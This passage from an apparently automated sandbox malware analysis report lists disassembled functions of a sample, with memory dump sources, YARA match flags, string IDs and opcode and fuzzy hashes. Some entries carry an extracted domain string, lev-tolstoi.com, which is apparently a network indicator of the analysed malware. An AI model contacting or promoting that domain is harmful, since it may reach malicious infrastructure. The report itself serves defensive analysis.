                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86
                                                                                                                                                                                                                                                                        Function 0071DE40 Relevance: 3.0, Strings: 2, Instructions: 528COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                                        • API String ID: 0-818776348
                                                                                                                                                                                                                                                                        • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                        • Instruction ID: e9901d899e1ecd8fc4c3bf689ba5ca4b40839af553896fba0070c3503d225dc7
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53F1EEB050D3D18ED335CF698490BEBBFE1AB92714F144AADC8D95B682C735094ACB93
                                                                                                                                                                                                                                                                        Function 0040DBD9 Relevance: 3.0, Strings: 2, Instructions: 528COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                                        • API String ID: 0-818776348
                                                                                                                                                                                                                                                                        • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                        • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                                                                                                                                                                                                                                        Function 0073DCBC Relevance: 2.9, Strings: 2, Instructions: 441COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                                        • API String ID: 0-3626284114
                                                                                                                                                                                                                                                                        • Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                                        • Instruction ID: 605d01770a6c98f55e2aed79c9300cb191b417242c63802f22d96fa611e8fc99
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7D1F73161D3D08EE7358B3984507ABBBE19FA3314F18896DD4D98B383D7798806DB52
                                                                                                                                                                                                                                                                        Function 0042DA53 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                                        • API String ID: 0-3626284114
                                                                                                                                                                                                                                                                        • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                                        • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                                                                                                                                                                                                                                        Function 004231C2 Relevance: 2.9, Strings: 2, Instructions: 432COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: R2B$6B
                                                                                                                                                                                                                                                                        • API String ID: 0-20043878
                                                                                                                                                                                                                                                                        • Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                                        • Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58
                                                                                                                                                                                                                                                                        Function 007311B7 Relevance: 2.9, Strings: 2, Instructions: 429COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: XG$|}
                                                                                                                                                                                                                                                                        • API String ID: 0-1014376750
                                                                                                                                                                                                                                                                        • Opcode ID: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                                                                                                                                                                                                                                                        • Instruction ID: f653c5ca14d7890f47510e45f621be689e2041867a2fe520e415902fe9c17150
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CD103B15083448BD724CF18C8927ABB7F1FFD2354F49895CE5968B7A2E7798801CB52
                                                                                                                                                                                                                                                                        Function 00420F50 Relevance: 2.9, Strings: 2, Instructions: 429COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: XG$|}
                                                                                                                                                                                                                                                                        • API String ID: 0-1014376750
                                                                                                                                                                                                                                                                        • Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                                        • Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56
                                                                                                                                                                                                                                                                        Function 00714587 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: )$IEND
                                                                                                                                                                                                                                                                        • API String ID: 0-707183367
                                                                                                                                                                                                                                                                        • Opcode ID: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
                                                                                                                                                                                                                                                                        • Instruction ID: a6d51b506529f220e04229857ab435a7f8b443d9b3bb3db7f96bf8373fd1e800
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7D18DB1908344DFD710CF18C845B9ABBE4AF94304F14452DF9999B3C1E779E988CB92
                                                                                                                                                                                                                                                                        Function 00404320 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: )$IEND
                                                                                                                                                                                                                                                                        • API String ID: 0-707183367
                                                                                                                                                                                                                                                                        • Opcode ID: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
                                                                                                                                                                                                                                                                        • Instruction ID: dbf6d47144c6b822b2acdb98883b9d528113f132bac91ec627b85730d464e823
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34D1CEB15083449FE720CF14D84575FBBE4AB94308F14492EFA99AB3C2E779D908CB96
                                                                                                                                                                                                                                                                        Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: i$r}A
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-2976846027
                                                                                                                                                                                                                                                                        • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                                                                                                                                                                                                        • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                                                                                                                                                                                                                                                        Function 0042A33F Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: d$d
                                                                                                                                                                                                                                                                        • API String ID: 0-195624457
                                                                                                                                                                                                                                                                        • Opcode ID: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                                                                                                                                                                                                                                                        • Instruction ID: a6a5a8ac2d59b7de1a8b575b3a10bb681eff341670204cea3f60d1849e0cf04e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1513A36908320CBC714CF24D85162BB7D2AB8A718F494A6DECC9A7351D7369D15CB8B
                                                                                                                                                                                                                                                                        Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: P<?$P<?
                                                                                                                                                                                                                                                                        • API String ID: 0-3449142988
                                                                                                                                                                                                                                                                        • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                                                                                                                                                                                                        • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                                                                                                                                                                                                                                                        Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: f
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                                                        • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                                                                                                                                                                                                        • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                                                                                                                                                                                                                                                        Function 0043D880 Relevance: 1.9, Strings: 1, Instructions: 641COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                                                                                                                                                                                        • Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88
                                                                                                                                                                                                                                                                        Function 0043D980 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                                        • Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                        Function 0043D999 Relevance: 1.8, Strings: 1, Instructions: 522COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                                        • Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                        Function 0043D997 Relevance: 1.8, Strings: 1, Instructions: 521COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                                        • Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                        Function 00438F59 Relevance: 1.7, Strings: 1, Instructions: 496COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: jk
                                                                                                                                                                                                                                                                        • API String ID: 0-78326018
                                                                                                                                                                                                                                                                        • Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                                        • Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754
                                                                                                                                                                                                                                                                        Function 0043DA80 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                                        • Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84
                                                                                                                                                                                                                                                                        Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: {}
                                                                                                                                                                                                                                                                        • API String ID: 0-4269290415
